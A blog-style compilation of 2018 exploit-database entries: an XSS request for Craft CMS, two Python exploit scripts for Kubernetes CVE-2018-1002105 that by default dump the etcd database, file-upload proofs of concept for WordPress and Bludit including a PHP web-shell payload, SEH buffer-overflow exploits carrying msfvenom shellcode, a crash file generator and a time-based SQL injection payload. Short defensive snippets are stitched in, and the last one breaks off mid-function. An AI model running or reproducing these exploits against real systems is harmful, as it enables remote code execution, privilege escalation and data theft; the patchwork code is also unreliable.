Contributors to this blog: HireHackking


# Exploit Title: Craft CMS 3.0.25 - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-12-20
# Exploit Author: Raif Berkay Dincel
# Contact: www.raifberkaydincel.com
# More Details [1] : https://www.raifberkaydincel.com/craft-cms-3-0-25-cross-site-scripting-vulnerability.html
# More Details [2] : https://github.com/rdincel1/Craft-CMS-3.0.25---Cross-Site-Scripting/blob/master/README.md
# Vendor Homepage: craftcms.com 
# Vulnerable Software --> [ https://github.com/rdincel1/Craft-CMS-3.0.25---Cross-Site-Scripting/raw/master/Craft-3.0.25.rar ] 
# Affected Version: [ 3.0.25 ]
# CVE-ID: CVE-2018-20418
# Tested on: Kali Linux / Linux Mint / Windows 10
 
# Vulnerable Parameter Type: POST 
# Vulnerable Parameter: http://127.0.0.1/admin-panel-path/index.php?p=admin/actions/entries/save-entry
# Attack Pattern: <script>alert("Raif_Berkay")</script> 
 
# Description
 
Saving a new title from the console tab allows cross-site scripting through the title field.
 
# Proof of Concepts:
 
POST /admin-panel-path/index.php?p=admin/actions/entries/save-entry HTTP/1.1
Host: IP:PORT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Registered-Asset-Bundles: ,craft\web\assets\quickpost\QuickPostAsset,craft\web\assets\cp\CpAsset,craft\web\assets\d3\D3Asset,craft\web\assets\elementresizedetector\ElementResizeDetectorAsset,craft\web\assets\garnish\GarnishAsset,yii\web\JqueryAsset,craft\web\assets\jquerytouchevents\JqueryTouchEventsAsset,craft\web\assets\velocity\VelocityAsset,craft\web\assets\jqueryui\JqueryUiAsset,craft\web\assets\jquerypayment\JqueryPaymentAsset,craft\web\assets\datepickeri18n\DatepickerI18nAsset,craft\web\assets\picturefill\PicturefillAsset,craft\web\assets\selectize\SelectizeAsset,craft\web\assets\fileupload\FileUploadAsset,craft\web\assets\xregexp\XregexpAsset,craft\web\assets\fabric\FabricAsset,craft\web\assets\prismjs\PrismJsAsset,craft\redactor\assets\field\FieldAsset,craft\redactor\assets\redactor\RedactorAsset,IP:PORT/admin-panel-path/cpresources/699311eb/fullscreen.js,IP:PORT/admin-panel-path/cpresources/5ec6eb0d/video.js,craft\web\assets\matrix\MatrixAsset,craft\web\assets\recententries\RecentEntriesAsset,craft\web\assets\feed\FeedAsset,craft\web\assets\dashboard\DashboardAsset
X-Registered-Js-Files: ,IP:PORT/admin-panel-path/cpresources/210842f9/d3.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/8c97f5da/element-resize-detector.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/a3075e2f/jquery.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/28095e6a/jquery.mobile-events.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/b288a952/velocity.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/12b5557f/garnish.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/fc2132f7/jquery-ui.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/aeaf06ba/jquery.payment.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/6270e830/datepicker-tr.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/2fad62a8/picturefill.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7bd34f2c/selectize.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/37456356/jquery.fileupload.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/71bf0ba6/xregexp-all.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7f38141/fabric.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7dfc6a65/js/Craft.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/92be564/QuickPostWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/2a8f54e3/prism.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/d443ac9b/redactor.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/d443ac9b/lang/tr.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/PluginBase.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetImageEditor.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetImages.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetFiles.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftEntryLinks.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/RedactorInput.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/Red
actorOverrides.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/699311eb/fullscreen.js,IP:PORT/admin-panel-path/cpresources/5ec6eb0d/video.js,IP:PORT/admin-panel-path/cpresources/2fd586d6/MatrixInput.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/5938f19a/RecentEntriesWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/ff3b78b9/FeedWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/86785e72/Dashboard.min.js?v=1545257412
X-CSRF-Token: 3DfArizwnHjDchbSztLrD2y9nzm5ZkSF2zukx2PZ3i6suVVTRScwwqtvPKqGXYiVZW1POc8cGtXlnjRfrfplCa1kg6nfVMOwm6fPN3BvkYrtM5QsDEV3dYhbSN1lBW6wFSNfiReM9Q3nAb9ut55USDtdUvokmt1DCs4AOm9Y0Ue1Gx1cmGd1Rzy0v3qTP3MsTi9z4tNJEVFdFMBCFtcEgKxH00WYzD8GdZk2aDlHVJHrMHOLTYzf1SzY2dJlO9ifBT0ZJcJNkvQk83bcygPe64lHjeBls_0-qCtA66-Qmz8L79Jw3QRysr5UkIEis6ZWmtAUCg9ufY_XDgrJ4D6xoV1Udw6pKny00KkAaszDUzyVXbrLuzWn063CqwRIDPS6jgr2Hjl8ERbpOinsVzELgiAbO7pxvJM00FTPI_nXFyl9NgusHfufMzqpUncmPLNxgn5yaN4mHz9EgtY7ynU6YQNTQp73e3B1bCfkd3zvZtP-KJgUwqVPbAHQUV5_HwPDxVs02R-_irNvlPeDAHaR6zdETXeKfLycZ70-kJtIqpo=
Content-Length: 857
Connection: close
Cookie: _ga=GA1.2.143638489.1545256652; _gid=GA1.2.362987822.1545256652; 1031b8c41dfff97a311a7ac99863bdc5_identity=3fe8168bce4c48f844d43d3855ef833d47ba56edc78686d732690216a40a7ee6a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A243%3A%22%5B%221%22%2C%22%5B%5C%226wiT39UWdaEONl4iVMf6YZKo0TXsitqlapyaB4s1w9PJxkC3lUIyQsTP12pW0NLCU03hRa_X8SAglzpjlTUJh47RcOcmjgBQE9uO%5C%22%2C%5C%2212a6fb6b-eb72-44c3-b890-6c71b8d2bb88%5C%22%2C%5C%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A64.0%29+Gecko%2F20100101+Firefox%2F64.0%5C%22%5D%22%2C3600%5D%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_username=2365234bf6c8d0bafa98169137b93dc9e6af973d5135b3f0dd94d23d71c923d2a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; CraftSessionId=asetaditigin2tb5uerlivl8h7; CRAFT_CSRF_TOKEN=f4c4ded0838271c4ba50e1e2953119ff3b266d2cedaeba1984823672a14f6e71a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22UpMNICaFkYV9aBp0gRMIdb67eo4FAjxx6iAYJIMM%7Ca6cfc948987f6fa5745a965899bdadc6ed38ce0c9b259fcaaa124e258d3f0f97UpMNICaFkYV9aBp0gRMIdb67eo4FAjxx6iAYJIMM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D; _gat=1
Cache-Control: no-transform
 
enabled=1&fieldsLocation=fields1428173416&CRAFT_CSRF_TOKEN=3DfArizwnHjDchbSztLrD2y9nzm5ZkSF2zukx2PZ3i6suVVTRScwwqtvPKqGXYiVZW1POc8cGtXlnjRfrfplCa1kg6nfVMOwm6fPN3BvkYrtM5QsDEV3dYhbSN1lBW6wFSNfiReM9Q3nAb9ut55USDtdUvokmt1DCs4AOm9Y0Ue1Gx1cmGd1Rzy0v3qTP3MsTi9z4tNJEVFdFMBCFtcEgKxH00WYzD8GdZk2aDlHVJHrMHOLTYzf1SzY2dJlO9ifBT0ZJcJNkvQk83bcygPe64lHjeBls_0-qCtA66-Qmz8L79Jw3QRysr5UkIEis6ZWmtAUCg9ufY_XDgrJ4D6xoV1Udw6pKny00KkAaszDUzyVXbrLuzWn063CqwRIDPS6jgr2Hjl8ERbpOinsVzELgiAbO7pxvJM00FTPI_nXFyl9NgusHfufMzqpUncmPLNxgn5yaN4mHz9EgtY7ynU6YQNTQp73e3B1bCfkd3zvZtP-KJgUwqVPbAHQUV5_HwPDxVs02R-_irNvlPeDAHaR6zdETXeKfLycZ70-kJtIqpo%3D&title=%3Cscript%3Ealert("Raif_XSS")%3C%2Fscript%3E&fields1428173416%5BfeaturedImage%5D=&fields1428173416%5BshortDescription%5D=&fields1428173416%5Bheading%5D=&fields1428173416%5Bsubheading%5D=&fields1428173416%5BarticleBody%5D=&sectionId=2&typeId=2
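As an added example (not part of the advisory), the check and the fix a defender would apply to the request above: decode the form body, flag fields whose decoded value carries script markers, and HTML-escape the title on output. The field names are the ones in the PoC body; SAMPLE_BODY is a constructed, trimmed copy of it, and the function names are assumptions.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample: the save-entry form body from the PoC above, trimmed to
# the fields that matter (the real request also carries the CSRF token).
SAMPLE_BODY = (
    "enabled=1&fieldsLocation=fields1428173416"
    '&title=%3Cscript%3Ealert("Raif_XSS")%3C%2Fscript%3E'
    "&fields1428173416%5Bheading%5D=&sectionId=2&typeId=2"
)

# Tags and handlers that never belong in a plain-text entry title.
SCRIPT_MARKERS = re.compile(
    r"<\s*/?\s*(script|iframe|object|embed|svg)\b|\bon[a-z]+\s*=|javascript:",
    re.IGNORECASE,
)


def parse_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {field: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def flag_script_fields(body: str) -> list:
    """Return the names of form fields whose decoded value carries script markers.

    Meant for a proxy/WAF log review of save-entry requests: the match runs on
    the decoded value, so %3Cscript%3E and <script> are treated alike.
    """
    fields = parse_form_body(body)
    return sorted(name for name, value in fields.items()
                  if SCRIPT_MARKERS.search(value))


def render_title(title: str) -> str:
    """Escape the stored title for an HTML text node or quoted attribute.

    This is the output-side fix (what a template engine's autoescape does).
    A title inserted into a <script> block would need JavaScript string
    encoding instead, which this helper does not cover.
    """
    return html.escape(title, quote=True)


if __name__ == "__main__":
    fields = parse_form_body(SAMPLE_BODY)
    print("flagged fields:", flag_script_fields(SAMPLE_BODY))
    print("stored title  :", fields["title"])
    print("rendered title:", render_title(fields["title"]))
```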
            
#!/usr/bin/env python3
import argparse
import base64
import ssl
from socket import create_connection
from secrets import token_bytes


def request_stage_1(namespace, pod, method, target, token):

    stage_1 = ""

    with open('stage_1', 'r') as stage_1_fd:
        stage_1 = stage_1_fd.read()

    return stage_1.format(namespace, pod, method, target,
                          token).encode('utf-8')


def request_stage_2(target, namespace, pod, container, command):

    stage_2 = ""

    command = f"command={'&command='.join(command.split(' '))}"

    with open('stage_2', 'r') as stage_2_fd:
        stage_2 = stage_2_fd.read()

    key = base64.b64encode(token_bytes(20)).decode('utf-8')

    return stage_2.format(namespace, pod, container, command,
                          target, key).encode('utf-8')


def run_exploit(target, stage_1, stage_2, method, filename, ppod,
                container):

    host, port = target.split(':')

    with create_connection((host, port)) as sock:

        # ssl.wrap_socket() no longer exists in Python 3.12+; an unverified
        # client context reproduces its old default (no certificate checking)
        tls = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        tls.check_hostname = False
        tls.verify_mode = ssl.CERT_NONE

        with tls.wrap_socket(sock) as ssock:
            print(f"[*] Building pipe using {method}...")
            ssock.send(stage_1)

            if b'400 Bad Request' in ssock.recv(4096):
                print('[+] Pipe opened :D')

            else:
                print('[-] Not sure if this went well...')

            print(f"[*] Attempting code exec on {ppod}/{container}")
            ssock.send(stage_2)

            if b'HTTP/1.1 101 Switching Protocols' not in ssock.recv(4096):
                print('[-] Exploit failed :(')

                return False

            data_incoming = True

            data = []

            while data_incoming:
                data_in = ssock.recv(4096)
                data.append(data_in)

                if not data_in:
                    data_incoming = False

            if filename:
                print(f"[*] Writing output to {filename} ....")

                with open(filename, 'wb+') as fd:
                    for msg in data:
                        fd.write(msg)

                    print('[+] Done!')

            else:
                print(''.join(msg.decode('unicode-escape')
                              for msg in data))


def main():

    parser = argparse.ArgumentParser(description='PoC for CVE-2018-1002105.')

    required = parser.add_argument_group('required arguments')
    optional = parser.add_argument_group('optional arguments')

    required.add_argument('--target', '-t', dest='target', type=str,
                          help='API server target:port', required=True)
    required.add_argument('--jwt', '-j', dest='token', type=str,
                          help='JWT token for service account', required=True)
    required.add_argument('--namespace', '-n', dest='namespace', type=str,
                          help='Namespace with method access',
                          default='default')
    required.add_argument('--pod', '-p', dest='pod', type=str,
                          required=True, help='Pod with method access')
    required.add_argument('--method', '-m', dest='method', choices=['exec',
                          'portforward', 'attach'], required=True)

    optional.add_argument('--privileged-namespace', '-s', dest='pnamespace',
                          help='Target namespace', default='kube-system')
    optional.add_argument('--privileged-pod', '-e', dest='ppod', type=str,
                          help='Target privileged pod',
                          default='etcd-kubernetes')
    optional.add_argument('--container', '-c', dest='container', type=str,
                          help='Target container', default='etcd')
    optional.add_argument('--command', '-x', dest='command', type=str,
                          help='Command to execute',
                          default='/bin/cat /var/lib/etcd/member/snap/db')
    optional.add_argument('--filename', '-f', dest='filename', type=str,
                          help='File to save output to', default=False)

    args = parser.parse_args()

    if args.target.find(':') == -1:
        print(f"[-] invalid target {args.target}")
        return False

    stage1 = request_stage_1(args.namespace, args.pod, args.method, args.target,
                             args.token)
    stage2 = request_stage_2(args.target, args.pnamespace, args.ppod,
                             args.container, args.command)

    run_exploit(args.target, stage1, stage2, args.method, args.filename,
                args.ppod, args.container)


if __name__ == '__main__':
    main()
            
#!/usr/bin/env python3
import argparse
import ssl
from json import loads, dumps
from socket import create_connection


def request_stage_1(base, version, target):

    stage_1 = ""

    with open('ustage_1', 'r') as stage_1_fd:
        stage_1 = stage_1_fd.read()

    return stage_1.format(base, version, target
                          ).encode('utf-8')


def request_stage_2(base, version, target_api, target):

    stage_2 = ""

    with open('ustage_2', 'r') as stage_2_fd:
        stage_2 = stage_2_fd.read()

    return stage_2.format(base, version, target_api, target,
                          ).encode('utf-8')


def read_data(ssock):

    data = []
    data_incoming = True

    while data_incoming:
        data_in = ssock.recv(4096)

        if not data_in:
            data_incoming = False

        elif data_in.find(b'\n\r\n0\r\n\r\n') != -1:
            data_incoming = False

        offset_1 = data_in.find(b'{')
        offset_2 = data_in.find(b'}\n')

        if offset_1 != -1 and offset_2 != -1:
            data_in = data_in[offset_1-1:offset_2+1]

        elif offset_1 != -1:
            data_in = data_in[offset_1-1:]

        elif offset_2 != -1:
            data_in = data_in[:offset_2-1]

        data.append(data_in)

    return data


def run_exploit(target, stage_1, stage_2, filename, json):

    host, port = target.split(':')

    with create_connection((host, port)) as sock:

        # ssl.wrap_socket() no longer exists in Python 3.12+; an unverified
        # client context reproduces its old default (no certificate checking)
        tls = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        tls.check_hostname = False
        tls.verify_mode = ssl.CERT_NONE

        with tls.wrap_socket(sock) as ssock:
            print('[*] Building pipe ...')
            ssock.send(stage_1)

            data_in = ssock.recv(15)

            if b'HTTP/1.1 200 OK' in data_in:
                print('[+] Pipe opened :D')
                read_data(ssock)

            else:
                print('[-] Not sure if this went well...')

            print("[*] Attempting to access url")

            ssock.send(stage_2)
            data_in = ssock.recv(15)

            if b'HTTP/1.1 200 OK' in data_in:
                print('[+] Pipe opened :D')

            data = read_data(ssock)

            return data


def parse_output(data, json, filename):

    if json:
        j = loads(''.join(i.decode('utf-8')
                          for i in data))

        data = dumps(j, indent=4)

    # the pretty-printed JSON is a str (text mode); raw chunks are bytes
    mode = 'w+' if json else 'wb+'

    if filename:
        print(f"[*] Writing output to {filename} ....")

        with open(filename, mode) as fd:
            if json:
                fd.write(data)

            else:
                for msg in data:
                    fd.write(msg)

            print('[+] Done!')

    else:
        if json:
            print(data)

        else:
            print(''.join(msg.decode('unicode_escape') for msg in data))


def main():

    parser = argparse.ArgumentParser(description='Unauthenticated PoC for'
                                                 ' CVE-2018-1002105')
    required = parser.add_argument_group('required arguments')
    optional = parser.add_argument_group('optional arguments')

    required.add_argument('--target', '-t', dest='target', type=str,
                          help='API server target:port', required=True)
    required.add_argument('--api-base', '-b', dest='base', type=str,
                          help='Target API name i.e. "servicecatalog.k8s.io"',
                          default="servicecatalog.k8s.io")
    required.add_argument('--api-target', '-u', dest='target_api', type=str,
                          help='API to access i.e. "clusterservicebrokers"',
                          default="clusterservicebrokers")

    optional.add_argument('--api-version', '-a', dest='version', type=str,
                          help='API version to use i.e. "v1beta1"',
                          default="v1beta1")
    optional.add_argument('--json', '-j', dest='json', action='store_true',
                          help='Print json output', default=False)
    optional.add_argument('--filename', '-f', dest='filename', type=str,
                          help='File to save output to', default=False)

    args = parser.parse_args()

    if args.target.find(':') == -1:
        print(f"[-] invalid target {args.target}")
        return False

    stage1 = request_stage_1(args.base, args.version, args.target)

    stage2 = request_stage_2(args.base, args.version, args.target_api,
                             args.target)

    output = run_exploit(args.target, stage1, stage2, args.filename, args.json)

    parse_output(output, args.json, args.filename)


if __name__ == '__main__':
    main()
            
# Exploit Title: WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
# Date: 2018-12-24
# Software Link: https://wordpress.org/plugins/baggage-freight/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 0.1.0
# Category: webapps

# Unrestricted file upload by an unauthorized user in the package-info upload
# process, allowing arbitrary file extensions.

File: upload-package.php

Vulnerable code:
if($_POST["submit"])
{
    if ($_FILES["file"])
    {
        // no capability/nonce check; the client-supplied name (and extension) is kept as-is
        $uploadpath = "../wp-content/plugins/baggage_shipping/upload/".time()."_".$_FILES["file"]["name"];

        move_uploaded_file($_FILES["file"]["tmp_name"],$uploadpath);
    }
}

# Exploitation example:

POST /wp-content/plugins/baggage-freight/upload-package.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
...
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="submit"

1
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="file"; filename="file.php"
Content-Type: audio/wav

<?php phpinfo();
-----------------------------18311719029180117571501079851--

# Uploaded file will be located at /wp-content/plugins/baggage_shipping/upload/{timestamp}_info.php.
            
# Exploit Title: bludit Pages Editor 3.0.0 - Arbitrary File Upload 
# Date: 2018-10-02
# Google Dork: N/A
# Exploit Author: BouSalman
# Vendor Homepage: https://www.bludit.com/
# Software Link: N/A
# Version: 3.0.0
# Tested on: Ubuntu 18.04
# CVE : 2018-1000811

POST /admin/ajax/upload-files HTTP/1.1
Host: 192.168.140.154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.140.154/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Length: 415
Content-Type: multipart/form-data; boundary=---------------------------26228568510541774541866388118
Cookie: BLUDIT-KEY=5s634f6up72tmfi050i4okunf9
Connection: close

-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="tokenCSRF"

67987ea926223b28949695d6936191d28d320f20
-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="bluditInputFiles[]"; filename="poc.php"
Content-Type: image/png

<?php system($_GET["cmd"]);?>

-----------------------------26228568510541774541866388118--
            
# Exploit Title: Iperius Backup 5.8.1 - Buffer Overflow (SEH)
# Date: 2018-12-26
# Exploit Author: bzyo
# Twitter: @bzyo_
# Vulnerable Software: Iperius Backup 5.8.1
# Vendor Homepage: https://www.iperiusbackup.com
# Version: 5.8.1 Local Buffer Overflow (SEH Unicode)
# Software Link: https://www.iperiusbackup.com/download.aspx?v=free
# Tested Windows 7 SP1 x86

# PoC
# 1. run script
# 2. open app and create backup job
# 3. on other processes tab, select 'run a program or open external file'
# 4. copy/paste iperius.txt contents into file location
# 5. select ok to complete creating backup job
# 6. run backup job
# 7. app crashes; pop calc

#!/usr/bin/python

filename="iperius.txt"

junk = "\x71" * 306

#popad
nseh = "\x61\x62"

#0x005b004a
#pop esi # pop ebx # ret  | startnull,unicode,asciiprint,ascii Iperius.exe
seh = "\x4a\x5b"

valign = (
"\x53" 					#push ebx
"\x47" 					#align
"\x58" 					#pop eax
"\x47" 					#align
"\x05\x12\x01" 	                        #add eax,200 
"\x47"					#align
"\x2d\x11\x01"	                        #sub eax,100
"\x47"					#align
"\x50"					#push eax
"\x47"					#align
"\xc3"					#retn
)

#509 bytes
#msfvenom -p windows/exec CMD=calc -e x86/unicode_upper BufferRegister=EAX
calc = (
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AI"
"AJQI1AYAZBABABABAB30APB944JBKLZH4BM0M0KPS0SYIUP1Y01TTKR0NP4K1BLLDK0RN4DK42O8LOH70JMV01KO6LOL31SLKRNLO0"
"7QHOLMM17WK2L21B1GDKQBN04KOZOLDKPLN148ZC18KQJ121TKB9O0KQ9C4K0IN8ZCOJQ9TK04TKM1YF01KOVL7QXOLMM1GWNXK045"
"ZVLC3ML8OK3MO43EZDQHTKR8O4M1XS2FDKLLPK4KB8MLKQJ3TKKTTKM1XPCYOTMTO41K1K310YPZ21KOIPQOQOPZDKN2ZKDMQM1ZM1"
"TMU582KPKPKP201XNQ4KRODGKOXU7KZP7EVB26BH76TUGMUMKOXUOLLFCLKZSPKK9PD5KU7K0GN33BBO1ZM01CKOXUQS1QBL33M0AA")

nops = "\x71"*109

fill = "\x71"*1000

buffer = junk + nseh + seh + valign + nops + calc + fill
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
            
# Exploit Title: Terminal Services Manager 3.1 - Buffer Overflow (SEH)
# Date: 2018-12-25
# Exploit Author: bzyo
# Twitter: @bzyo_
# Vulnerable Software: Terminal Services Manager 3.1
# Vendor Homepage: https://lizardsystems.com
# Version: 3.1 
# Software Link: https://lizardsystems.com/download/tsmanager_setup.exe
# Tested Windows 7 SP1 x86

# Other affected software from the vendor
# Software Link: https://lizardsystems.com/download/rpexplorer_setup.exe
# Software Link: https://lizardsystems.com/download/rshutdown_setup.exe
# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe

# PoC
# 1. run script
# 2. run add computers wizard
# 3. select import from files
# 4. paste tsmang.txt into computer names field
# 5. pop calc

#bad chars \x00\x0d\x0e

#!/usr/bin/python

import struct

junk2 = "A"*100
junk1 = "B"*74
jmp2 = "\xe9\x71\xfe\xff\xff\xcc"
jmp1 = "\xeb\xf8\xcc\xcc"

#0x0049709f : pop esi # pop ebx # ret  tsmanager.exe
seh = struct.pack('<L',0x0049709f)

#Payload size: 220 bytes
#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0d\x0e" -f python
calc =  ""
calc += "\xdb\xcd\xd9\x74\x24\xf4\x5a\x2b\xc9\xbe\xbb\x1e\xdd"
calc += "\x8e\xb1\x31\x31\x72\x18\x83\xc2\x04\x03\x72\xaf\xfc"
calc += "\x28\x72\x27\x82\xd3\x8b\xb7\xe3\x5a\x6e\x86\x23\x38"
calc += "\xfa\xb8\x93\x4a\xae\x34\x5f\x1e\x5b\xcf\x2d\xb7\x6c"
calc += "\x78\x9b\xe1\x43\x79\xb0\xd2\xc2\xf9\xcb\x06\x25\xc0"
calc += "\x03\x5b\x24\x05\x79\x96\x74\xde\xf5\x05\x69\x6b\x43"
calc += "\x96\x02\x27\x45\x9e\xf7\xff\x64\x8f\xa9\x74\x3f\x0f"
calc += "\x4b\x59\x4b\x06\x53\xbe\x76\xd0\xe8\x74\x0c\xe3\x38"
calc += "\x45\xed\x48\x05\x6a\x1c\x90\x41\x4c\xff\xe7\xbb\xaf"
calc += "\x82\xff\x7f\xd2\x58\x75\x64\x74\x2a\x2d\x40\x85\xff"
calc += "\xa8\x03\x89\xb4\xbf\x4c\x8d\x4b\x13\xe7\xa9\xc0\x92"
calc += "\x28\x38\x92\xb0\xec\x61\x40\xd8\xb5\xcf\x27\xe5\xa6"
calc += "\xb0\x98\x43\xac\x5c\xcc\xf9\xef\x0a\x13\x8f\x95\x78"
calc += "\x13\x8f\x95\x2c\x7c\xbe\x1e\xa3\xfb\x3f\xf5\x80\xf4"
calc += "\x75\x54\xa0\x9c\xd3\x0c\xf1\xc0\xe3\xfa\x35\xfd\x67"
calc += "\x0f\xc5\xfa\x78\x7a\xc0\x47\x3f\x96\xb8\xd8\xaa\x98"
calc += "\x6f\xd8\xfe\xfa\xee\x4a\x62\xd3\x95\xea\x01\x2b"

buffer = junk2 + calc + junk1 + jmp2 + jmp1 + seh

with open("tsmang.txt","wb") as f:
    f.write(buffer[:-1])
            
# Exploit Title: Product Key Explorer 4.0.9 - Denial of Service (PoC)
# Date: 2018-12-25
# Exploit Author: T3jv1l
# Vendor Homepage: :http://www.nsauditor.com
# Software: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Contact: https://twitter.com/T3jv1l
# Version:  Product Key Explorer 4.0.9
# Tested on: Windows 7 SP1 x86

# Other affected software from the vendor
# Software: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Software: http://www.nsauditor.com/downloads/apkf_setup.exe
# Software: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe
# Software: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
# Software: http://www.nsauditor.com/downloads/spotmsn_setup.exe
# Software: http://www.nsauditor.com/downloads/spotie_setup.exe
# Software: http://www.nsauditor.com/downloads/spotftp_setup.exe
# Software: http://www.network-inventory-software.com/downloads/nhsi_setup.exe
# Software: http://www.nsauditor.com/downloads/nsi_setup.exe
# Software: http://www.nsauditor.com/downloads/blueauditor_setup.exe
# Software: http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Software: http://www.nsauditor.com/downloads/remshutdown_setup.exe
# Software: http://www.nsauditor.com/downloads/dnss_setup.exe

# PoC:
# 1.  Download and install the setup file
# 2.  A file "PoC.txt" will be created
# 3.  Click Help > Register... in tool bar
# 4.  Copy the contents of the file (PoC.txt) and paste in the Registration Key/Name field 
# 5.  Click OK and BOOMMMM !!!! 

#!/usr/bin/python

buffer = "\x41" * 2000
buffer += "\x42" * 2000
buffer += "\x43" * 1000

payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
            
# Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection
# Date: 2018-12-28
# Software Link: https://wordpress.org/plugins/adicons/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 1.2
# Category: webapps

# SQL Injection
# File: addIcon.php
# Vulnerable code:
# $placement=$_POST['selectedPlace'];

# $x=explode("_",$placement);
# $ck=$wpdb->get_row("select id from ".$table_prefix."adicons where adRow=".$x[0]." and adCol=".$x[1]);

# Example payload:
selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- -
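Added example, not the plugin's code: a Python model of the fix for addIcon.php. In WordPress the equivalent is `$wpdb->prepare()` with `%d` placeholders after validating both halves of selectedPlace; here sqlite3 stands in for MySQL, the wp_adicons table and its rows are constructed, ADVISORY_PAYLOAD is the payload quoted above, and the function names are assumptions.

```python
import re
import sqlite3

# Placement strings as the plugin expects them: "<row>_<col>" with integer halves.
PLACEMENT_RE = re.compile(r"^(\d{1,6})_(\d{1,6})$")

# Constructed copy of the example payload from the advisory above.
ADVISORY_PAYLOAD = "1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- -"


def parse_placement(selected_place: str) -> tuple:
    """Validate selectedPlace before it goes anywhere near SQL.

    explode("_") in the plugin accepts anything; here both halves must be
    digits, so the time-based payload never reaches the database.
    """
    m = PLACEMENT_RE.match(selected_place)
    if not m:
        raise ValueError(f"invalid placement: {selected_place!r}")
    return int(m.group(1)), int(m.group(2))


def is_valid_placement(selected_place: str) -> bool:
    try:
        parse_placement(selected_place)
        return True
    except ValueError:
        return False


def build_vulnerable_sql(table_prefix: str, selected_place: str) -> str:
    """The query text the original string concatenation hands to MySQL (contrast only)."""
    x = selected_place.split("_")
    col = x[1] if len(x) > 1 else ""
    return f"select id from {table_prefix}adicons where adRow={x[0]} and adCol={col}"


def lookup_adicon(conn: sqlite3.Connection, table_prefix: str, selected_place: str):
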